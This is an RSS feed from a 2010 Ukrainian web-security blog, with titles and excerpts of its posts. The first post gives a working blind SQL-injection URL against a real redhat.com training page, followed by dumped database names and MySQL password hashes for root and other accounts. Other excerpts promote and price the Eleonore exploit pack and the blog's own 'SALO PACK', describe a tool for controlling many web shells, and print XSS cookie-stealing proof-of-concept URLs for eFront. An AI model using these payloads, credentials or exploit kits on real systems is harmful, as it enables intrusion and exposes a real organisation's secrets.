<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Ukrainian Security Community - Блог спеціалістів з безпеки веб-додатків &#187; Безпека</title>
	<atom:link href="http://uasc.org.ua/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://uasc.org.ua</link>
	<description>Ukrainian Security Community - Блог спеціалістів з безпеки веб-додатків</description>
	<lastBuildDate>Tue, 27 Jul 2010 17:28:19 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Знімаємо капелюха або .redhat.com sql-inj ;-)</title>
		<link>http://uasc.org.ua/2010/04/%d0%b7%d0%bd%d1%96%d0%bc%d0%b0%d1%94%d0%bc%d0%be-%d0%ba%d0%b0%d0%bf%d0%b5%d0%bb%d1%8e%d1%85%d0%b0-redhat-sql-inj/</link>
		<comments>http://uasc.org.ua/2010/04/%d0%b7%d0%bd%d1%96%d0%bc%d0%b0%d1%94%d0%bc%d0%be-%d0%ba%d0%b0%d0%bf%d0%b5%d0%bb%d1%8e%d1%85%d0%b0-redhat-sql-inj/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 10:17:59 +0000</pubDate>
		<dc:creator>snake</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[redhat.com]]></category>
		<category><![CDATA[sql-inj]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=899</guid>
		<description><![CDATA[Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.
Не буду тягнуть кота за яйця:


http://www.es.redhat.com/training/register.php?course=EX333&#38;date=20101119+скуля--+&#38;country=BE3&#38;ref_id=

@@tmpdir: /tmp/
@@basedir: /usr/
version(): 5.0.77-log
database(): redhateurope
user(): www@localhost
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu  (що не дивно ))))
redhatapac
redhatcn
test
email
redhates
_orms
redhatfr
box_us
redhatin
redhatbr
redhatit
redhatde
redhatkr
mysql
redhateurope
information_schema
drupal
redhatglobal
redhatcz
redhatlatam
mysql.user
www:*49D3CEBD189B8C5D4A47C975133BB2357A327585
repl:*F317577FF00A2A4112982CAE6A174DF23557C02F
root:*F317577FF00A2A4112982CAE6A174DF23557C02F
drupal:*7AFEAE5774E672996251E09B946CB3953FC67656
 

]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/%d0%b7%d0%bd%d1%96%d0%bc%d0%b0%d1%94%d0%bc%d0%be-%d0%ba%d0%b0%d0%bf%d0%b5%d0%bb%d1%8e%d1%85%d0%b0-redhat-sql-inj/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>TARGET: ORACLE. 0day експлойт</title>
		<link>http://uasc.org.ua/2010/04/oracle-zeroday/</link>
		<comments>http://uasc.org.ua/2010/04/oracle-zeroday/#comments</comments>
		<pubDate>Mon, 12 Apr 2010 10:58:50 +0000</pubDate>
		<dc:creator>dsu</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[DBMS_JOB PACKAGE]]></category>
		<category><![CDATA[find_date]]></category>
		<category><![CDATA[FUNCTION]]></category>
		<category><![CDATA[oracle]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[zeroday]]></category>
		<category><![CDATA[експлойт]]></category>
		<category><![CDATA[зіродей]]></category>
		<category><![CDATA[зиродей]]></category>
		<category><![CDATA[оракл]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=892</guid>
		<description><![CDATA[Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30    CUR := DBMS_SQL.OPEN_CURSOR;
31       BEGIN
32
33         DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/oracle-zeroday/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>madShellC0ntr01 &#8211; система для роботи з шеллами</title>
		<link>http://uasc.org.ua/2010/04/madshellc0ntr01-%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0-%d0%b4%d0%bb%d1%8f-%d1%80%d0%be%d0%b1%d0%be%d1%82%d0%b8-%d0%b7-%d1%88%d0%b5%d0%bb%d0%bb%d0%b0%d0%bc%d0%b8/</link>
		<comments>http://uasc.org.ua/2010/04/madshellc0ntr01-%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0-%d0%b4%d0%bb%d1%8f-%d1%80%d0%be%d0%b1%d0%be%d1%82%d0%b8-%d0%b7-%d1%88%d0%b5%d0%bb%d0%bb%d0%b0%d0%bc%d0%b8/#comments</comments>
		<pubDate>Sun, 11 Apr 2010 19:07:24 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Кодинг]]></category>
		<category><![CDATA[Command Execution]]></category>
		<category><![CDATA[madshell]]></category>
		<category><![CDATA[madShellC0ntr01]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[контроль]]></category>
		<category><![CDATA[управление шеллами]]></category>
		<category><![CDATA[шелли]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=887</guid>
		<description><![CDATA[madShellC0ntr01 v1.2
Писався софт достатньо давно, та і виключно в цілях ознайомлення   Якщо чесно, то я вже навіть не пам&#8217;ятаю чи реалізував все що хотів, чи ні (хоча скоріше, що ні). Отже, дозвольте представити вам систему для роботи з великою кількістю веб-шеллів типу madshell.

Меню:


Shell List
Stats
Add shells
Command Execution
Logs



Думаю все інтуїтивно зрозуміло (:
В версії 1.2 система [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/04/madshellc0ntr01-%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0-%d0%b4%d0%bb%d1%8f-%d1%80%d0%be%d0%b1%d0%be%d1%82%d0%b8-%d0%b7-%d1%88%d0%b5%d0%bb%d0%bb%d0%b0%d0%bc%d0%b8/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Тест зв&#8217;язки експлойтів Eleonore exploits pack</title>
		<link>http://uasc.org.ua/2010/03/%d1%82%d0%b5%d1%81%d1%82-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b8-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-eleonore-exploits-pack/</link>
		<comments>http://uasc.org.ua/2010/03/%d1%82%d0%b5%d1%81%d1%82-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b8-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-eleonore-exploits-pack/#comments</comments>
		<pubDate>Tue, 30 Mar 2010 15:10:18 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[auth]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[Eleonore]]></category>
		<category><![CDATA[Exmanoize]]></category>
		<category><![CDATA[loads]]></category>
		<category><![CDATA[pack]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[вразливості]]></category>
		<category><![CDATA[експлойти]]></category>
		<category><![CDATA[елеонор]]></category>
		<category><![CDATA[зв'язка]]></category>
		<category><![CDATA[сплойти]]></category>
		<category><![CDATA[тест]]></category>
		<category><![CDATA[трафік]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=870</guid>
		<description><![CDATA[Хочу надати вам інформацію про тестування зв&#8217;язки експлойтів  Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв&#8217;язки входять такі експлойти


MDAC
MS009-02
Telnet &#8211; Opera
Font tags &#8211; FireFox
PDF collab.getIcon
PDF Util.Printf
PDF collab.collectEmailInfo
DirectX DirectShow
Spreadsheet


Середній пробив характерний для звязки:

usa: 5-15%
mix: 10-25%

Ціни:

Власне зв&#8217;язка = 700$
Чищення від АВ = 50$
Ребілд на інший домен = 50$

Як не дивно, та в системі [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/%d1%82%d0%b5%d1%81%d1%82-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b8-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-eleonore-exploits-pack/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Виводим сайт в топ на UA TOP Bloggers або взлом top.blog.net.ua</title>
		<link>http://uasc.org.ua/2010/03/%d0%b2%d0%b8%d0%b2%d0%be%d0%b4%d0%b8%d0%bc-%d1%81%d0%b0%d0%b9%d1%82-%d0%b2-%d1%82%d0%be%d0%bf-%d0%bd%d0%b0-ua-top-bloggers-%d0%b0%d0%b1%d0%be-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-top-blog-net-ua/</link>
		<comments>http://uasc.org.ua/2010/03/%d0%b2%d0%b8%d0%b2%d0%be%d0%b4%d0%b8%d0%bc-%d1%81%d0%b0%d0%b9%d1%82-%d0%b2-%d1%82%d0%be%d0%bf-%d0%bd%d0%b0-ua-top-bloggers-%d0%b0%d0%b1%d0%be-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-top-blog-net-ua/#comments</comments>
		<pubDate>Fri, 26 Mar 2010 16:12:12 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[top.blog.net.ua]]></category>
		<category><![CDATA[UA TOP Bloggers]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[вивести в топ]]></category>
		<category><![CDATA[виводим]]></category>
		<category><![CDATA[накрутка]]></category>
		<category><![CDATA[скуля]]></category>
		<category><![CDATA[топ]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=863</guid>
		<description><![CDATA[Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи.
Що треба щоб бути в топі?
UA TOP Bloggers визначає позиції сайту за такими показниками:

Кількість хостів (унікальні користувачі)
Кількіст [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/%d0%b2%d0%b8%d0%b2%d0%be%d0%b4%d0%b8%d0%bc-%d1%81%d0%b0%d0%b9%d1%82-%d0%b2-%d1%82%d0%be%d0%bf-%d0%bd%d0%b0-ua-top-bloggers-%d0%b0%d0%b1%d0%be-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-top-blog-net-ua/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>0-day експлойт для Internet Explorer</title>
		<link>http://uasc.org.ua/2010/03/0-day-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82-%d0%b4%d0%bb%d1%8f-internet-explorer/</link>
		<comments>http://uasc.org.ua/2010/03/0-day-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82-%d0%b4%d0%bb%d1%8f-internet-explorer/#comments</comments>
		<pubDate>Fri, 12 Mar 2010 15:03:09 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[0-day]]></category>
		<category><![CDATA[download & execute]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[IE6]]></category>
		<category><![CDATA[IE7]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[експлойт]]></category>
		<category><![CDATA[зіродей]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=839</guid>
		<description><![CDATA[Експлойт був знайдений на сайті www.topix21century.com. Начинка експлойта завантажувала та виконувала на комп&#8217;ютері жертви бінарний файл, який в свою чергу встановлював зєднання з www.topix21century.com.
Наразі вже є готовий експлойт написаний для Metasploit Framework. Успішно спрацював на вказаних продуктах:
– Microsoft Internet Explorer 7, Windows Vista SP2
– Microsoft Internet Explorer 7, Windows XP SP3
– Microsoft Internet Explorer 6, [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/0-day-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82-%d0%b4%d0%bb%d1%8f-internet-explorer/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Взлом Міністерства Освіти і Науки України &#8211; стаття в хакері</title>
		<link>http://uasc.org.ua/2010/03/811/</link>
		<comments>http://uasc.org.ua/2010/03/811/#comments</comments>
		<pubDate>Mon, 01 Mar 2010 19:34:27 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[gov сайты под угрозой]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[мон]]></category>
		<category><![CDATA[стаття]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=811</guid>
		<description><![CDATA[В журналі &#8220;][акер" #134 2010 р. вийшла моя стаття "GOV сайты под угрозой". Далі оригінал статті на російській мові.

GOV сайты под угрозой
Взлом сайта Министерства образования и науки Украины
Paketik (http://uasc.org.ua) (З невідомих причин в журналі надрукували "Анонім", хоча я подавав саме такі дані)
В последнее время мне все чаще попадаются уязвимые государственные сайты. А причина банальна: сайты [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/811/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Ідеальна безпека сайту</title>
		<link>http://uasc.org.ua/2010/02/%d1%96%d0%b4%d0%b5%d0%b0%d0%bb%d1%8c%d0%bd%d0%b0-%d0%b1%d0%b5%d0%b7%d0%bf%d0%b5%d0%ba%d0%b0-%d1%81%d0%b0%d0%b9%d1%82%d1%83/</link>
		<comments>http://uasc.org.ua/2010/02/%d1%96%d0%b4%d0%b5%d0%b0%d0%bb%d1%8c%d0%bd%d0%b0-%d0%b1%d0%b5%d0%b7%d0%bf%d0%b5%d0%ba%d0%b0-%d1%81%d0%b0%d0%b9%d1%82%d1%83/#comments</comments>
		<pubDate>Mon, 22 Feb 2010 12:31:11 +0000</pubDate>
		<dc:creator>presidentua</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[nginx]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[захист]]></category>
		<category><![CDATA[обмеження]]></category>
		<category><![CDATA[сервер]]></category>
		<category><![CDATA[хакінг]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=795</guid>
		<description><![CDATA[Найпопулярніше питаня до нас це &#8220;Як зробити, щоб нічого не робити, а сайт був супер-безпечний&#8221;, і постійно ми відповідали по різному максимально приховуючи АБСОЛЮТНО-СУПЕР-СЕКРЕТНУ технологію, що була розроблема століння назад. І лише сьогодні цім секретом поділимося ), тож якщо ви хочете створювати безпечний сайт, то ось 5 рекомендацій:

При програмуванні використовуйте фреймворки, типу ЗендФреймворка, КодеІгнайтера, Джанго, [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/02/%d1%96%d0%b4%d0%b5%d0%b0%d0%bb%d1%8c%d0%bd%d0%b0-%d0%b1%d0%b5%d0%b7%d0%bf%d0%b5%d0%ba%d0%b0-%d1%81%d0%b0%d0%b9%d1%82%d1%83/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>SALO PACK &#8211; Зв&#8217;язка сплойтів (exploit pack)</title>
		<link>http://uasc.org.ua/2010/02/salo-pack-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b0-%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-exploit-pack/</link>
		<comments>http://uasc.org.ua/2010/02/salo-pack-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b0-%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-exploit-pack/#comments</comments>
		<pubDate>Fri, 19 Feb 2010 17:00:02 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[Кодинг]]></category>
		<category><![CDATA[exploit pack]]></category>
		<category><![CDATA[salo pack]]></category>
		<category><![CDATA[зв'язка експлойтів]]></category>
		<category><![CDATA[связка сплойтов]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=786</guid>
		<description><![CDATA[
SALO PACK © UASC
by n0153r, Dimi4

Даний програмний продукт призначений тільки для освітніх цілей. Використання його в будь-якому іншому
вигляді може бути розцінено як порушення закону!
Заборонено продаж і використання вихідного коду SALO PACK в комерційних цілях


Коротка характеристика:

Мультисистемна зв&#8217;язка експлойтів зі статистикою. (Написана з нуля)
Крипт коду експлойтів за технологією розробленою UASC. (n0153r)
Використання технології Sajax
Детальна статистика по країнах, пробивах, броузерах, операційних систах.
Підрахунок [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/02/salo-pack-%d0%b7%d0%b2%d1%8f%d0%b7%d0%ba%d0%b0-%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82%d1%96%d0%b2-exploit-pack/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Система виявлення вторгнень AntiBdoor</title>
		<link>http://uasc.org.ua/2010/02/%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0-%d0%b2%d0%b8%d1%8f%d0%b2%d0%bb%d0%b5%d0%bd%d0%bd%d1%8f-%d0%b2%d1%82%d0%be%d1%80%d0%b3%d0%bd%d0%b5%d0%bd%d1%8c-antibdoor/</link>
		<comments>http://uasc.org.ua/2010/02/%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0-%d0%b2%d0%b8%d1%8f%d0%b2%d0%bb%d0%b5%d0%bd%d0%bd%d1%8f-%d0%b2%d1%82%d0%be%d1%80%d0%b3%d0%bd%d0%b5%d0%bd%d1%8c-antibdoor/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 17:53:02 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Кодинг]]></category>
		<category><![CDATA[antibdoor]]></category>
		<category><![CDATA[hids]]></category>
		<category><![CDATA[host-based ids]]></category>
		<category><![CDATA[ids]]></category>
		<category><![CDATA[свв]]></category>
		<category><![CDATA[система виявлення вторгень]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=774</guid>
		<description><![CDATA[AntiBdoor є безкоштовною, вузловою СВВ, з відкритим вихідним кодом (Host-based IDS, HIDS). Вона забезпечує аналіз цілісності файлів, виявлення потенційно небезпечних програм, активні заходи у відповідь на загрозу.
Для розробки системи використано технології PHP, SQL, XHTML, CSS, AJAX.
Центр адміністратора  складається з таких розділів :

Get detected alerts /вивести знайдені загрози/.
Check files /перевірка файлів/.
Exceptions /виключення/.
Crawl /Сканування/.
Search Shells /пошук вебшеллів [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/02/%d1%81%d0%b8%d1%81%d1%82%d0%b5%d0%bc%d0%b0-%d0%b2%d0%b8%d1%8f%d0%b2%d0%bb%d0%b5%d0%bd%d0%bd%d1%8f-%d0%b2%d1%82%d0%be%d1%80%d0%b3%d0%bd%d0%b5%d0%bd%d1%8c-antibdoor/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Добуваєм трафік з Google Wave :)</title>
		<link>http://uasc.org.ua/2010/01/%d0%b4%d0%be%d0%b1%d1%83%d0%b2%d0%b0%d1%94%d0%bc-%d1%82%d1%80%d0%b0%d1%84%d1%96%d0%ba-%d0%b7-google-wave/</link>
		<comments>http://uasc.org.ua/2010/01/%d0%b4%d0%be%d0%b1%d1%83%d0%b2%d0%b0%d1%94%d0%bc-%d1%82%d1%80%d0%b0%d1%84%d1%96%d0%ba-%d0%b7-google-wave/#comments</comments>
		<pubDate>Mon, 25 Jan 2010 15:38:34 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Tips & Tricks]]></category>
		<category><![CDATA[Безпека]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=770</guid>
		<description><![CDATA[
Виявляється з Google Wave можна досить легко добути трохи унікальних відвідувачів на свій блог. На цю вразливість наштовхнув мене life_is_shit, за що йому велике спасибі  . Отже як це зробити читаєм під катом  
Отже все зводиться до додавання гаджета в хвилю. Гаджети для Google Wave це звичайнісінькі XML документи, в які ми можемо добавити [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/01/%d0%b4%d0%be%d0%b1%d1%83%d0%b2%d0%b0%d1%94%d0%bc-%d1%82%d1%80%d0%b0%d1%84%d1%96%d0%ba-%d0%b7-google-wave/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Реверс віруса Piggy</title>
		<link>http://uasc.org.ua/2010/01/%d1%80%d0%b5%d0%b2%d0%b5%d1%80%d1%81-%d0%b2%d1%96%d1%80%d1%83%d1%81%d0%b0-piggy/</link>
		<comments>http://uasc.org.ua/2010/01/%d1%80%d0%b5%d0%b2%d0%b5%d1%80%d1%81-%d0%b2%d1%96%d1%80%d1%83%d1%81%d0%b0-piggy/#comments</comments>
		<pubDate>Tue, 19 Jan 2010 14:02:57 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Tips & Tricks]]></category>
		<category><![CDATA[Безпека]]></category>
		<category><![CDATA[icq]]></category>
		<category><![CDATA[Piggy]]></category>
		<category><![CDATA[віруса]]></category>
		<category><![CDATA[Реверс]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=763</guid>
		<description><![CDATA[Почнемо з того, що сьогодні з `явився новий вірус для icq &#8211; на ім&#8217;я &#8220;Piggy&#8220;.

Після реверсу вірусу за допомогою Olly, я зрозумів як працює алгоритм.
Piggy був написаний на Delphi, це я зясував за допомогою peid.


Даний використовує свій алгоритм декодування рядків. Всі рядки в ньому &#8211; набір одиничок і нуликів (простіше кажучи &#8211; ASCII код).

Дані, які [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2010/01/%d1%80%d0%b5%d0%b2%d0%b5%d1%80%d1%81-%d0%b2%d1%96%d1%80%d1%83%d1%81%d0%b0-piggy/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Міжсайтовий скриптинг в Efront 3.5.5</title>
		<link>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront-3-5-5/</link>
		<comments>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront-3-5-5/#comments</comments>
		<pubDate>Tue, 29 Dec 2009 16:43:56 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[efront]]></category>
		<category><![CDATA[vulnerabilitie]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=752</guid>
		<description><![CDATA[27.10.09
Програма: efront
Версія 3.5.5
Рівень небезпеки: Низький
Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.
На сайті efrontlearning.net запевняють що в релізі 2009/11/23 v3.5.5 build 5208 :
 • Added additional sanitization to eliminate xss attacks 

Насправді ж, можливість проведення XSS атаки залишилась( хоча periklis запевняв: &#8220;this issue is (supposed to be) solved in later versions&#8221; ). Параметр message_type недостатньо фільтруєтся. Приклад Passive [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront-3-5-5/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Міжсайтовий скриптинг в Efront</title>
		<link>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront/</link>
		<comments>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront/#comments</comments>
		<pubDate>Sun, 27 Dec 2009 12:53:11 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[efront]]></category>
		<category><![CDATA[vulnerabilities]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=747</guid>
		<description><![CDATA[27.10.09
Програма: efront
Версія 3.5.3
Рівень небезпеки: Низький
Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.
Вразливість існує через недостатню фільтрацію вхідних данних  в параметрах &#8220;lessons_ID&#8220;, &#8220;message&#8221; в сценарії index.php. Віддалений користувач має змогу за допомогою спеціально сформованого запиту виконати довільний код сценарію в браузері атакуємого.
PoC:
http://site.com/index.php?message=%3Cscript%3Ealert(document.cookie)%3C/script%3E&#38;message_type=success
http://site.com/index.php?ctg=lesson_info&#38;lessons_ID=5%3Cscript%3Ealert(document.cookie)%3C/script%3E
]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/12/%d0%bc%d1%96%d0%b6%d1%81%d0%b0%d0%b9%d1%82%d0%be%d0%b2%d0%b8%d0%b9-%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82%d0%b8%d0%bd%d0%b3-%d0%b2-efront/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Oracle Hack: Oracle DB обхід деяких обмежень.</title>
		<link>http://uasc.org.ua/2009/12/oracle-hack-oracle-db-%d0%be%d0%b1%d1%85%d1%96%d0%b4-%d0%b4%d0%b5%d1%8f%d0%ba%d0%b8%d1%85-%d0%be%d0%b1%d0%bc%d0%b5%d0%b6%d0%b5%d0%bd%d1%8c/</link>
		<comments>http://uasc.org.ua/2009/12/oracle-hack-oracle-db-%d0%be%d0%b1%d1%85%d1%96%d0%b4-%d0%b4%d0%b5%d1%8f%d0%ba%d0%b8%d1%85-%d0%be%d0%b1%d0%bc%d0%b5%d0%b6%d0%b5%d0%bd%d1%8c/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 03:46:13 +0000</pubDate>
		<dc:creator>dsu</dc:creator>
				<category><![CDATA[Інше]]></category>
		<category><![CDATA[Безпека]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=738</guid>
		<description><![CDATA[І знову про Oracle 
Header 

Уявімо ситуацію:
1. Back-end: Oracle Database Sever (8i-10g).
2. Front-end: Apache + php (будь-http сервер + будь-який інтерпретатор, не важливо який, але для наочності візьмемо php, саме його я і використовував при написанні цієї статті).
3. Завдання: обійти обмеження і отримати якомога більше інформації
4. Захист: фільтр where, set, insert у запиті.
5. Ми будемо [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/12/oracle-hack-oracle-db-%d0%be%d0%b1%d1%85%d1%96%d0%b4-%d0%b4%d0%b5%d1%8f%d0%ba%d0%b8%d1%85-%d0%be%d0%b1%d0%bc%d0%b5%d0%b6%d0%b5%d0%bd%d1%8c/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Oracle DBMS_SQLHASH.GETHASH exploit (perl)</title>
		<link>http://uasc.org.ua/2009/11/oracle-dbms_sqlhash-gethash-exploit-perl/</link>
		<comments>http://uasc.org.ua/2009/11/oracle-dbms_sqlhash-gethash-exploit-perl/#comments</comments>
		<pubDate>Sat, 28 Nov 2009 18:52:00 +0000</pubDate>
		<dc:creator>dsu</dc:creator>
				<category><![CDATA[Інше]]></category>
		<category><![CDATA[Безпека]]></category>
